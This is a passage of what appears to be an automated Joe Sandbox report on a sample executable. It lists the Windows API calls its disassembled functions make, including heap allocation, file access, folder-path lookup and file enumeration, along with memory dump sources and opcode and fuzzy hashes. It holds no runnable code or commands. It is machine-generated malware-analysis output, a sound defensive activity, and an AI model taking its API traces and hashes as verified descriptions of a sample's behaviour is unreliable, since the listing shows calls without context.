                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00CA0DE8,00000000,?), ref: 00C97B40
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00C97B47
                                    • GetLocalTime.KERNEL32(?,?,?,?,?,00CA0DE8,00000000,?), ref: 00C97B54
                                    • wsprintfA.USER32 ref: 00C97B83
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                     • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateLocalProcessTimewsprintf
                                    • String ID:
                                    • API String ID: 377395780-0
                                    • Opcode ID: 5c4f4adb175cb0f29e901be172204b2df2a23376ca4e13907945ad17ff6b1e86
                                    • Instruction ID: d663ef63d13b590d0546a78f59db8a2ef48b50c6c5684f839cdfed620b646e0f
                                    • Opcode Fuzzy Hash: 5c4f4adb175cb0f29e901be172204b2df2a23376ca4e13907945ad17ff6b1e86
                                    • Instruction Fuzzy Hash: ED11FEB2908219ABCB14DBD9ED45BBFB7F8EB4CB12F10415AF605A2280D7795940D7B0
                                    APIs
                                    • CreateFileA.KERNEL32(00C93D3E,80000000,00000003,00000000,00000003,00000080,00000000,?,00C93D3E,?), ref: 00C9948C
                                    • GetFileSizeEx.KERNEL32(000000FF,00C93D3E), ref: 00C994A9
                                    • CloseHandle.KERNEL32(000000FF), ref: 00C994B7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseCreateHandleSize
                                    • String ID:
                                    • API String ID: 1378416451-0
                                    • Opcode ID: 641e7c58ddeeb0a9e71652a7ce717d880ce9d1260d8e299b6cf3a9ce6fc92af1
                                    • Instruction ID: d4d56b27dad2fc88208db9a991f574603db21275f74fa4df4ac24ebcdedf1cef
                                    • Opcode Fuzzy Hash: 641e7c58ddeeb0a9e71652a7ce717d880ce9d1260d8e299b6cf3a9ce6fc92af1
                                    • Instruction Fuzzy Hash: ADF03C39E04308BBDB10EBB5EC49F9E77B9AB48711F108658FA11A7280D670A6019F90
                                    APIs
                                    • __getptd.LIBCMT ref: 00C9CA7E
                                      • Part of subcall function 00C9C2A0: __amsg_exit.LIBCMT ref: 00C9C2B0
                                    • __getptd.LIBCMT ref: 00C9CA95
                                    • __amsg_exit.LIBCMT ref: 00C9CAA3
                                    • __updatetlocinfoEx_nolock.LIBCMT ref: 00C9CAC7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                    • String ID:
                                    • API String ID: 300741435-0
                                    • Opcode ID: 5f1e4816d0422af9855fd406bba5c1d7fbf0127a9ba3b6be4841452ef93edc4a
                                    • Instruction ID: d6fe6e3ad1b4a14cadadabdbbdd577d2e47308b90ddddebd33b2c089f1e1cf7c
                                    • Opcode Fuzzy Hash: 5f1e4816d0422af9855fd406bba5c1d7fbf0127a9ba3b6be4841452ef93edc4a
                                    • Instruction Fuzzy Hash: 3DF0B432944B19ABDF20FBF8A88F75E33A0AF01724F510149F415A71D2CF245D40BB95
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Catch
                                    • String ID: MOC$RCC
                                    • API String ID: 78271584-2084237596
                                    • Opcode ID: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                                    • Instruction ID: 7cafab767e5af7a6304e7f8baaabfcec2c297726584d41c96e5eedb4f0b4b0c6
                                    • Opcode Fuzzy Hash: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                                    • Instruction Fuzzy Hash: 71414971900209AFDF15DF98DC85BEEBBB5FF48304F188199FA08A62A1D3359A50DF61
                                    APIs
                                      • Part of subcall function 00C98F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00C98F9B
                                    • lstrcat.KERNEL32(?,00000000), ref: 00C951CA
                                    • lstrcat.KERNEL32(?,00CA1058), ref: 00C951E7
                                    • lstrcat.KERNEL32(?,01528910), ref: 00C951FB
                                    • lstrcat.KERNEL32(?,00CA105C), ref: 00C9520D
                                      • Part of subcall function 00C94B60: wsprintfA.USER32 ref: 00C94B7C
                                      • Part of subcall function 00C94B60: FindFirstFileA.KERNEL32(?,?), ref: 00C94B93
                                      • Part of subcall function 00C94B60: StrCmpCA.SHLWAPI(?,00CA0FC4), ref: 00C94BC1
                                      • Part of subcall function 00C94B60: StrCmpCA.SHLWAPI(?,00CA0FC8), ref: 00C94BD7
                                      • Part of subcall function 00C94B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00C94DCD
                                      • Part of subcall function 00C94B60: FindClose.KERNEL32(000000FF), ref: 00C94DE2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                    • String ID:
                                    • API String ID: 2667927680-0
                                    • Opcode ID: cabaa7a63f4987b7c60d4699c30aefdd6244a720dc2b1f7a0caa9eb92db024c0
                                    • Instruction ID: 337252ba0feec4d26048e8a4e66df23bed270b5197d7af0083bdc368f46f7eb1
                                    • Opcode Fuzzy Hash: cabaa7a63f4987b7c60d4699c30aefdd6244a720dc2b1f7a0caa9eb92db024c0
                                    • Instruction Fuzzy Hash: 7E21F5B690030CABCB14FBB0FC46EED733C9B95701F404554B65593491EE70AAC89F91